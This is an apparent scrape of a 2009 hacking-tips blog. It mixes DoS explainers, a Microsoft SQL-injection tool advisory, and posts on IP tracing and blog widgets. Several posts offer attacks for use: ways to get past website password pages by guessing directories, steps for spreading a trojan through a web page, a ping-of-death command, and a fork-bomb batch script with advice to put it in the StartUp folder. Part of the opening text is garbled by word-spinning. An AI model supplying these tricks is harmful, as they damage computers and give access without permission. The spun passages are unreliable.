<span>� <span class="IL_SPAN">Connection</span> Request � First packet (SYN) sent from the supplicant to the server, preliminary the three-way handclasp</span><br />
� Request Acknowledgement � Second packet (SYN+ACK) sent from the server to the requester<br />
<span>� <span class="IL_SPAN">Connection</span> Complete � Third packet (ACK) sent from the supplicant back to the server, implementation the three-way handshake</span><br />
<br />
<span>The attack consists of a flood of unacceptable SYN packets with spoofed source IP addresses. The spoofed source address causes the target server to react to the SYN with a SYN-ACK to an unwary or absent source machine. The aim then waits for an ACK packet from the source to total the link. The ACK never comes and ties up the <span class="IL_SPAN">connection</span> table with a awaiting <span class="IL_SPAN">connection</span><span> ask for that by no means completes. The bench will rapidly fill up and devour all obtainable capital with invalid requests. While the number of link entries may differ from one server to another, tables may fill up with only hundreds or thousands of requests. The result is a denial of <span class="IL_SPAN">service</span> since, once a table is full, the target server is unable to <span class="IL_SPAN">service</span><span> lawful requests. The difficulty with SYN <span class="IL_SPAN">attacks</span> is that each request in separation looks benign. An unacceptable ask for is very difficult to differentiate from a lawful one.</span></span></span><br />
<br />
The complexity with SYN assault is that each request in separation looks caring. An invalid request is very hard to differentiate from a lawful one.<br />
<br />
<br />
<span>Method 6 � Established <span class="IL_SPAN">Connection</span> Flood</span><br />
<br />
<span>An Recognized <span class="IL_SPAN">Connection</span> Flood is an development of the SYN Flood attack that employs a array of zombies to commit a DDoS attack on a aim. Zombies found apparently lawful connections to the end server. By using a large number of zombies, each creating a large number of connections to the target, an attacker can make so many connections that the aim is no longer able to believe to lawful link requests. For example, if a thousand zombies make a thousand connections to a end server, the server have got to run a million open connections. The result is similar to a SYN Flood attack in that it devour server funds, but is even more difficult to sense.</span><br />
<br />
<span>Method 7 � Connections Per Second <span class="IL_SPAN">Floods</span></span><br />
<span>Connections Per Second (CPS) Flood <span class="IL_SPAN">attacks</span> flood servers with a high rate of connections from a apparently valid source. In these <span class="IL_SPAN">attacks</span>, an attacker or army of zombies attempts to drain server resources by rapidly setting up and ripping down TCP connections, perhaps begining a request on each link. For example, an attacker strength use his zombie army to frequently obtain the home page from a target web server. The resulting load makes the server tremendously lethargic. visit </span><a href="http://www.blockdos.net/" style="color: #335689; text-decoration: none;">DDoS Protection</a></span></h3><h3 class="post-title entry-title" style="text-align: justify;">1. SQL injection </h3><div style="text-align: justify;"><b>SQL Injection : "The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."<br />
<br />
The MSRC released an advisory recently that discusses the recent SQL injection attacks and announces three new tools to help identify and block these types of vulnerabilities. The advisory discusses the new tools, the purpose of each, and the way each complements the others. The goal of this blog post is to help you identify the best tool to use depending on your role (i.e. Web Developers vs. IT administrators).<br />
<br />
Web Developers Recommendations<br />
<br />
* The Microsoft Source Code Analyzer for SQL Injection (MSCASI) is a static code analysis tool that identifies SQL Injection vulnerabilities in ASP code (ASP pages are the ones that have been under attack). In order to run MSCASI you will need source code access and MSCASI will output areas vulnerable to SQL injection (i.e. the root cause and vulnerable path is identified). In our view, fixing the root cause of the bug is the best way to eradicate vulnerabilities. MSCASI scans ASP source code and generates warnings for first order and second order SQL Injection vulnerabilities. Please refer to the SQL team’s blog and KB 954476 for more details.<br />
<br />
IT/Database Administrators Recommendations (as well as Web developers)<br />
<br />
We are recommending two of the new tools announced today. One can help identify SQL injection vulnerabilities by crawling the website. The other one aims to block potential SQL injection attacks by filtering malicious requests. The website crawler will be useful if you don't have access to the source code.<br />
<br />
* Microsoft worked with the HP Web Security Research group to release the Scrawlr tool. The tool will crawl a website, simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr uses some of the same technology found in HP WebInspect but has been built to focus only on SQL Injection vulnerabilities. This will allow an IT/DB admin to easily find vulnerabilities similar to the ones that have been used to compromise sites in recent attacks. No source code is required to run this tool. From a starting URL, the tool recursively crawls that URL in order to build up a site tree that will be then analyzed for SQL injection vulnerabilities. For more information check out the HP Web Security Research blog.<br />
<br />
* In order to block and mitigate SQL injection attacks (while the root cause is being fixed), you can also deploy SQL filters using a new release of URLScan 3.0. This tool restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from being executed on the server. It uses a set of keywords to block certain requests. If a bad request is detected, the filter will drop the request and it will not be processed by SQL. That said, if a SQL injection flaw has been identified, we highly encourage you to fix the root cause of the problem instead of attempting to produce the perfect filter (since in our view this is error prone). Please refer to one of the two IIS blog posts (1, 2) and the technical documentation for more details.<br />
<br />
Tool Name: MSCASI<br />
Usuage:Identifies SQL Injection vulnerabilities in ASP code through static source code analysis.<br />
Pros:Identify the root cause of the bug at the source code level.<br />
Cons:This version currently only works on ASP pages.<br />
For: WEB Developers<br />
<br />
<br />
Tool Name 2: Scrawlr<br />
Usuage:Detect SQL vulnerability using runtime analysis by crawling a website.<br />
Pros:No source code is required.<br />
Cons:Cannot identify the line of code responsible<br />
For: IT/DB Administrator,Web developers<br />
<br />
Tool Name 3: UrlScan v3.0 Beta<br />
Usuage: Runtime filtering that blocks the types of HTTP requests that Internet Information Services (IIS) will process.<br />
Pros: URLScan filter can be easily deployed to mitigate SQL injection attack while the root cause is being fixed.<br />
Cons: Not fixing the root cause, thus the risk has not been eliminated completely.</b><br />
</div><div style="text-align: justify;"><b><br />
For:IT Administrators</b><br />
</div><div style="text-align: justify;"><b> </b> <br />
</div><div style="text-align: justify;"><br />
</div><h2 class="post-title" style="text-align: justify;">2. Hacking Password Protected Website's</h2>warning : For educational purpose only<br />
<div class="entry" style="text-align: justify;"><b><br />
i know dis is lame but just would like to share wid u.<br />
have nothing for next half an hour so typing it.. lol<br />
<br />
<br />
<span style="font-family: Garamond;">here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting<br />
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .<br />
<br />
Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.<br />
<br />
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.<br />
<br />
We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloadin</span><span style="font-family: Times, 'Times New Roman', serif;">g.</span></b><br />
</div><div class="entry" style="text-align: justify;"><br />
</div><div class="entry" style="text-align: justify;"><br />
</div><div class="entry" style="text-align: justify;"><h2><a href="http://hackernepal.blogspot.com/2009/10/trojan-attack-through-html.html">3. TROJAN ATTACK THROUGH HTML</a></h2>This was a normal html code which would create a simple webpage.<br />
<br />
Now what you have to do is,<br />
the server file of your trojan you will have to upload it on some webhosting and then change the link of the server file in the code and then save this code as "index.html" and then upload it to the same host.<br />
<br />
All done, now everytime someone opens that webpage they would be infected with your trojan's server :)<br />
<a href="javascript:void(0);" onclick="_linkInterstitial('http://tinypaste.com/6b4b3'); return false;" target="_blank">http://tinypaste.com/6b4b3</a><img src="http://lh3.ggpht.com/_Nhh98Ix90W8/ScM3nBn3jHI/AAAAAAAAAMA/tmbICeAVMgs/biaoqing_004.png" /><img src="http://lh6.ggpht.com/_Nhh98Ix90W8/ScM3kp40rvI/AAAAAAAAALs/NBGZpj8og2Y/biaoqing_009.png" /><img src="http://lh6.ggpht.com/_Nhh98Ix90W8/ScM3kp40rvI/AAAAAAAAALs/NBGZpj8og2Y/biaoqing_009.png" /><br />
<br />
expecting good replies<img src="http://lh3.ggpht.com/_fSdIwybOxlw/SkY89HRYiAI/AAAAAAAAASU/uUB1rjfUVnY/emoticons0027.gif" /><img src="http://lh4.ggpht.com/_fSdIwybOxlw/SkY89CwJ-kI/AAAAAAAAASc/cptwB3-ISZc/emoticons0037.gif" /> <a href="http://hackernepal.blogspot.com/2009/10/trojan-attack-through-html.html" name="comments"></a> <br />
<h3 id="comments"><br />
</h3><h3 id="comments"><br />
</h3><h2><a href="http://hackernepal.blogspot.com/2009/10/dos-attacks-or-denial-of-services.html">4. dos attacks or denial of services attack</a></h2><h3 id="comments">dos attacks or denial of services attack have become very common amongst hackers<br />
who use them as a path to fame and respect in the underground groups of the<br />
internet. denial of service attacks basically means denying valid internet and<br />
network users from using the services of the target network or server. it<br />
basically means, launching an attack, which will temporarily make the services,<br />
offered by the network unusable by legitimate users.<br />
in others words one can describe a dos attack, saying that a dos attack is one<br />
in which you clog up so much memory on the target system that it cannot serve<br />
legitimate users. or you send the target system data packets, which cannot be<br />
handled by it and thus causes it to either crash, reboot or more commonly deny<br />
services to legitimate users.<br />
dos attacks are of the following different types-:<br />
those that exploit vulnerabilities in the tcp/ip protocols suite.<br />
those that exploit vulnerabilities in the ipv4 implementation.<br />
3 there are also some brute force attacks, which try to use up all<br />
resources of the target system and make the services unusable.<br />
before i go on with dos attacks, let me explain some vulnerabilities in tcp/ip<br />
itself. some common vulnerabilities are ping of death, teardrop, syn attacks and<br />
land attacks.<br />
ping of death<br />
this vulnerability is quite well known and was earlier commonly used to hang<br />
remote systems (or even force them to reboot) so that no users can use its<br />
services. this exploit no longer works, as almost all system administrators<br />
would have upgraded their systems making them safe from such attacks.<br />
in this attack, the target system is pinged with a data packet that exceeds the<br />
maximum bytes allowed by tcp/ip, which is 65 536. this would have almost always<br />
caused the remote system to hang, reboot or crash. this dos attack could be<br />
carried out even through the command line, in the following manner:<br />
the following ping command creates a giant datagram of the size 65540 for ping.<br />
it might hang the victim's computer:<br />
c:\windows>ping -l 65540<br />
teardrop<br />
the teardrop attack exploits the vulnerability present in the reassembling of<br />
data packets. whenever data is being sent over the internet, it is broken down<br />
into smaller fragments at the source system and put together at the destination<br />
system. say you need to send 4000 bytes of data from one system to the other,<br />
then not all of the 4000 bytes is sent at one go. this entire chunk of data is<br />
first broken down into smaller parts and divided into a number of packets, with<br />
each packet carrying a specified range of data. for example, say 4000 bytes is<br />
divided into 3 packets, then:<br />
the first packet will carry data from 1 byte to 1500 bytes<br />
the second packet will carry data from 1501 bytes to 3000 bytes<br />
the third packet will carry data from 3001 bytes to 4000 bytes<br />
these packets have an offset field in their tcp header part. this offset field<br />
specifies from which byte to which byte does that particular data packet carries<br />
data or the range of data that it is carrying. this along with the sequence<br />
numbers helps the destination system to reassemble the data packets in the<br />
correct order. now in this attack, a series of data packets are sent to the<br />
target system with overlapping offset field values. as a result, the target<br />
system is not able to reassemble the packets and is forced to crash, hang or<br />
reboot.<br />
say for example, consider the following scenario-: (note: _ _ _ = 1 data packet)<br />
normally a system receives data packets in the following form, with no<br />
overlapping offset values.<br />
_ _ _ _ _ _<br />
_ _ _<br />
(1 to 1500 bytes) (1501 to 3000 bytes)<br />
(3001 to 4500 bytes)<br />
now in a teardrop attack, the data packets are sent to the target computer in<br />
the following format:<br />
_ _ _ _ _ _<br />
_ _ _<br />
(1 to 1500 bytes) (1500 to 3000 bytes)<br />
(1001 to 3600 bytes)<br />
when the target system receives something like the above, it simply cannot<br />
handle it and will crash or hang or reboot.<br />
syn attack<br />
the syn attack exploits tcp/ip's three-way handshake. thus in order to<br />
understand as to how syn attacks work, you need to first know how tcp/ip<br />
establishes a connection between two systems. whenever a client wants to<br />
establish a connection with a host, then three steps take place. these three<br />
steps are referred to as the three-way handshake.<br />
in a normal three way handshake, what happens is that, the client sends a syn<br />
packet to the host, the host replies to this packet with a syn ack packet. then<br />
the client responds with a ack (acknowledgement) packet. this will be clearer<br />
after the following depiction of these steps-:<br />
client --------syn packet-------------- � Host<br />
in the first step the client sends a syn packet to the host, with whom it wants<br />
to establish a three-way connection. the syn packet requests the remote system<br />
for a connection. it also contains the initial sequence number or isn of the<br />
client, which is needed by the host to put back the fragmented data in the<br />
correct sequence.<br />
host -------------syn/ack packet----------� Client<br />
in the second step, the host replies to the client with a syn/ack packet. this<br />
packet acknowledges the syn packet sent by the client and sends the client its<br />
own isn.<br />
client --------------ack-----------------------� Host<br />
in the last step the client acknowledges the syn/ack packet sent by the host by<br />
replying with a ack packet.<br />
these three steps together are known as the 3-way handshake and only when they<br />
are completed is a complete tcp/ip connection established.<br />
in a syn attack, several syn packets are sent to the server but all these syn<br />
packets have a bad source ip address. when the target system receives these syn<br />
packets with bad ip addresses, it tries to respond to each one of them with a<br />
syn ack packet. now the target system waits for an ack message to come from the<br />
bad ip address. however, as the bad ip does not actually exist, the target<br />
system never actually receives the ack packet. it thus queues up all these<br />
requests until it receives an ack message. the requests are not removed unless<br />
and until, the remote target system gets an ack message. hence these requests<br />
take up or occupy valuable resources of the target machine.<br />
to actually affect the target system, a large number of syn bad ip packets have<br />
to be sent. as these packets have a bad source ip, they queue up, use up<br />
resources and memory or the target system and eventually crash, hang or reboot<br />
the system.<br />
land attacks<br />
a land attack is similar to a syn attack, the only difference being that instead<br />
of a bad ip address, the ip address of the target system itself is used. this<br />
creates an infinite loop between the target system and the target system itself.<br />
however, almost all systems have filters or firewalls against such attacks.<br />
smurf attacks<br />
a smurf attack is a sort of brute force dos attack, in which a huge number of<br />
ping requests are sent to a system (normally the router) in the target network,<br />
using spoofed ip addresses from within the target network. as and when the<br />
router gets a ping message, it will route it or echo it back, in turn flooding<br />
the network with packets, and jamming the traffic. if there are a large number<br />
of nodes, hosts etc in the network, then it can easily clog the entire network<br />
and prevent any use of the services provided by it.<br />
read more about the smurf attacks at cert:<br />
http://www.cert.org/advisories/ca-98.01.smurf.html<br />
udp flooding<br />
this kind of flooding is done against two target systems and can be used to stop<br />
the services offered by any of the two systems. both of the target systems are<br />
connected to each other, one generating a series of characters for each packet<br />
received or in other words, requesting udp character generating service while<br />
the other system, echoes all characters it receives. this creates an infinite<br />
non-stopping loop between the two systems, making them useless for any data<br />
exchange or service provision.<br />
distributed dos attacks<br />
dos attacks are not new; in fact they have been around for a long time. however<br />
there has been a recent wave of distributed denial of services attacks which<br />
pose a great threat to security and are on the verge of overtaking<br />
viruses/trojans to become the deadliest threat to internet security. now you<br />
see, in almost all of the above tcp/ip vulnerabilities, which are being<br />
exploited by hackers, there is a huge chance of the target's system<br />
administrator or the authorities tracing the attacks and getting hold of the<br />
attacker.<br />
now what is commonly being done is, say a group of 5 hackers join and decide to<br />
bring a fortune 500 company's server down. now each one of them breaks into a<br />
smaller less protected network and takes over it. so now they have 5 networks<br />
and supposing there are around 20 systems in each network, it gives these<br />
hackers, around 100 systems in all to attack from. so they sitting on there home<br />
computer, connect to the hacked less protected network, install a denial of<br />
service tool on these hacked networks and using these hacked systems in the<br />
various networks launch attacks on the actual fortune 500 company. this makes<br />
the hackers less easy to detect and helps them to do what they wanted to do<br />
without getting caught. as they have full control over the smaller less<br />
protected network they can easily remove all traces before the authorities get<br />
there.<br />
not even a single system connected to the internet is safe from such ddos<br />
attacks. all platforms including unix, windows nt are vulnerable to such<br />
attacks. even macos has not been spared, as some of them are being used to<br />
conduct such ddos attacks.<br />
end of dos attack....<br />
p.humayun khan </h3><h3 id="comments"><br />
</h3><h2><a href="http://hackernepal.blogspot.com/2009/10/how-to-crash-computer-in-less-than-20.html">5.How to crash a computer in less than 20 secs:</a></h2><h3 id="comments">How to crash a computer in less than 20 secs:<br />
open a text document and put this in it:<br />
@ECHO OFF<br />
:loop<br />
start cmd.exe<br />
goto loop<br />
Save this as test.bat on a safe place. Run it and the computer will crash. Put it in the StartUp<br />
folder and the computer will crash everytime it starts. DAMN IM EVIL :D <br />
</h3> <b><span style="font-family: Times, 'Times New Roman', serif;"><br />
</span></b><br />
</div><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-62069570048487490252009-10-17T05:39:00.000-07:002009-10-20T01:57:34.790-07:00tips and tricks(5)<div class="content" style="text-align: justify;"><div id="lw_context_ads"><div style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br />
</div><br />
<h2><span class="Apple-style-span" style="font-family: Arial, Helvetica; font-size: 12px; font-weight: normal; line-height: 20px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 15px; font-weight: bold; line-height: normal;">How to Trace Any IP Address</span><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">In my earlier post I had discussed about <a href="http://www.gohacking.com/2009/05/how-to-find-the-ip-address-of-a-remote-computer.html" style="color: #b50000; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;">how to capture the IP address</a> of a remote computer. Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com. Just go to<a href="http://www.ip2location.com/demo.aspx" rel="nofollow" style="color: #b50000; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank">http://www.ip2location.com/demo.aspx</a> and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">1. Country in which the IP is located<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">2. Region<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">3. City<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">4. Latitude/Longitude<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">5. Zip Code<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">6. Time Zone<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">7. Name of the ISP<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">8. Internet Speed<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">9. Weather Station<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">10. Area Code and<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">11. Domain name associated with the IP address.<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">A sample snapshot of the results from ip2location.com is given below<br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"><img alt="ip2location_results" class="aligncenter size-full wp-image-1716" height="123" src="http://www.gohacking.com/wp-content/uploads/2009/10/ip2location_results1.jpg" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 5px; margin-left: 0px; margin-right: 10px; margin-top: 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px;" title="ip2location_results" width="482" /><br />
</div><div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 15px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">You can also visually trace route any IP address back to it’s location. For this just visit<a href="http://www.yougetsignal.com/tools/visual-tracert/" rel="nofollow" style="color: #b50000; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank">http://www.yougetsignal.com/tools/visual-tracert/</a> and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.<br />
</div></span></h2><h2><br />
</h2><h2><a href="http://eknol.blogspot.com/2009/05/how-to-check-available-username-in.html">How To Check Available Username In Mulitple Social Networking Sites By One Click</a></h2><div id="lw_context_ads"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif3gDS5wUj8dIIm2iWaRIBq86G4u2cHwzgoDC4Q2RFdEGM4xyI5PMnyD90C4WBtCc7Rz3KCDuv74Pe7F3P9iucR0V2KTWs7uTvEfnO7gDRwToTvYfJCCXt5tgEUKaOU4KN8ULBrnsNzvNj/s1600-h/name+chk.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5341559447017250258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif3gDS5wUj8dIIm2iWaRIBq86G4u2cHwzgoDC4Q2RFdEGM4xyI5PMnyD90C4WBtCc7Rz3KCDuv74Pe7F3P9iucR0V2KTWs7uTvEfnO7gDRwToTvYfJCCXt5tgEUKaOU4KN8ULBrnsNzvNj/s400/name+chk.jpg" style="cursor: pointer; float: left; height: 60px; margin: 0pt 10px 10px 0pt; width: 194px;" /></a><a href="http://eknol.blogspot.com/2009/03/keep-in-touch-with-pro-bloggers-and.html" style="font-weight: bold;">Social Networking</a> is a place where we meet peoples, make them friends and share the things we love and find on the web. And there are lots of <a href="http://eknol.blogspot.com/2009/02/how-to-get-your-all-social-network-at.html" style="font-weight: bold;">social networking sites</a>. We have many friends who have accounts in different <a href="http://eknol.blogspot.com/2008/11/great-firefox-add-ons-for-social.html"><span style="font-weight: bold;">social networking sites</span></a>. So we also have to make an account in all these sites to keep in touch with our friends. Sometimes we start making accounts in various sites but if we got the same user name in all the sites then it is better else different user name make our friends worse. They find it difficult to remember us by different user names on all sites.<br />
<br />
<a href="http://namechk.com/" rel="nofollow" style="font-weight: bold;" target="_blank">Namechk</a> is a free utility to find our desired username in dozens of popular <span style="font-weight: bold;">Social Networking</span> and <a href="http://eknol.blogspot.com/2009/02/how-to-make-good-content-on-your-social.html"><span style="font-weight: bold;">Social Bookmarking</span></a> websites. Promote your brand consistently by registering a username that is still available on the majority of the most popular sites. Find the best username with namechk. Namechk has a facility to check user name in approximate 122 sites. This is a big number of social networking sites in which we can check available desired user name in just a Click. So hurry up check your favorite name in all the networks else other one takes it.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEpnV9nkI6ndYCyuzt3nNRA1HRSyMyYxXfDOXRE09YnilxXpkY9zylBRMgYa1Hy86h4CbP-STRkDtGZVTOsog0sAR-XcKHkcCoRqVcSZ1cGTyMn8SXQB8YQzNwY8KOmPE-NRlGM9UFln1z/s1600-h/name+chk+social+networking.JPG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5341559903232687698" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEpnV9nkI6ndYCyuzt3nNRA1HRSyMyYxXfDOXRE09YnilxXpkY9zylBRMgYa1Hy86h4CbP-STRkDtGZVTOsog0sAR-XcKHkcCoRqVcSZ1cGTyMn8SXQB8YQzNwY8KOmPE-NRlGM9UFln1z/s400/name+chk+social+networking.JPG" style="cursor: pointer; display: block; height: 265px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />
</div><script type="text/javascript">
<!--
google_ad_client="pub-5080261867823597";
google_ad_host="pub-1556223355139109";
google_ad_width=336;
google_ad_height=280;
google_ad_format="336x280_as";
google_ad_type="text_image";
google_color_border="FFFFFF";
google_color_bg="FFFFFF";
google_color_link="0000FF";
google_color_url="000000";
google_color_text="000000";
//-->
</script> <script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script><script>
google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);
</script><ins style="border: medium none; display: inline-table; height: 280px; margin: 0pt; padding: 0pt; position: relative; visibility: visible; width: 336px;"></ins><br />
<ins style="border: medium none; display: block; height: 280px; margin: 0pt; padding: 0pt; position: relative; visibility: visible; width: 336px;"></ins><br />
<br />
<h2> </h2><h2><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQor-RaRfZ9voOBmWi9Yn9svyH0B6PhWYmN1R2rC_T827Cvx9N4S0er7x4Ho1pc5Mul1jdRjv2tFsai0AKsng_Ym-Dl7j70wjVdF8IZdHZkzSPAzqPoA5oNYUrstDtv9rBSrtwL_4l-Foe/s1600/blogger+tool+bar.bmp" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="blogger tool bar" border="0" id="BLOGGER_PHOTO_ID_5364886544420120786" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQor-RaRfZ9voOBmWi9Yn9svyH0B6PhWYmN1R2rC_T827Cvx9N4S0er7x4Ho1pc5Mul1jdRjv2tFsai0AKsng_Ym-Dl7j70wjVdF8IZdHZkzSPAzqPoA5oNYUrstDtv9rBSrtwL_4l-Foe/s400/blogger+tool+bar.bmp" style="height: 128px; margin-top: 0pt; width: 266px;" /></a>How To Install Blog Tool bar In Blog to Increase Trafic and Page Views</h2><br />
</div><div id="lw_context_ads"><br />
</div><div id="lw_context_ads"><span style="font-size: x-small;">Do you have noticed a new change to my blog. I have blogger tool bar installed on my blog. Which have lots of features like Blog search, Web search, Translation, <a href="http://eknol.blogspot.com/2009/05/how-to-recent-post-with-thumbnails-in.html" style="font-weight: bold;">Recent Posts</a>, Random Post, and <a href="http://eknol.blogspot.com/2009/01/how-to-find-your-urls-feed-address.html" style="font-weight: bold;">Feed</a> Button, Share This ,Twitter and latest notifications from my <a href="http://eknol.blogspot.com/2009/02/how-to-make-good-content-on-your-social.html" style="font-weight: bold;">social networking</a> like<a href="http://eknol.blogspot.com/2009/04/are-you-twitterholic-know-your-stats.html" style="font-weight: bold;"> twitter</a> ,face book? This tool bar is free of cost and a simple little java script.3<br />
<br />
<span style="font-weight: bold;">How to create your Own Blogger Tool Bar</span>.<br />
<a href="http://wibiya.com/" rel="nofollow" style="font-weight: bold;" target="_blank">Wibiya</a> the professional Tool bar providers. Wibiya provides it free of cost. Before providing you this tool bar they take some time to review your blog. After approval your will have to submit information about your blog, Feed and <a href="http://eknol.blogspot.com/2009/02/how-to-get-your-all-social-network-at.html" style="font-weight: bold;">social networks</a>. And in just few click you are ready with your new tool bar.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizLda3sJC_2n4Iql9PfkG4nx6ljR-rK_5YOqLsukdHqWENq5ujCKxFCX8XVOIqK6IdPk8Yt80ThJMvyUXu8WjGMWdtg5rVwSds5u2yWhm5F2ObFOt_kWD-c4TZEAXDJ2fzAAjZDibXPEpu/s1600-h/Blogger+Tool+Bar.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5364889969557505986" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizLda3sJC_2n4Iql9PfkG4nx6ljR-rK_5YOqLsukdHqWENq5ujCKxFCX8XVOIqK6IdPk8Yt80ThJMvyUXu8WjGMWdtg5rVwSds5u2yWhm5F2ObFOt_kWD-c4TZEAXDJ2fzAAjZDibXPEpu/s400/Blogger+Tool+Bar.jpg" style="cursor: pointer; display: block; height: 266px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />
<span style="font-weight: bold;">Features that Wibiya Provides</span><br />
<br />
<span style="font-weight: bold;">Create a Facebook Community</span><br />
</span><br />
<ul><li><span style="font-size: x-small;"> Create a blog community using Facebook Connect</span></li>
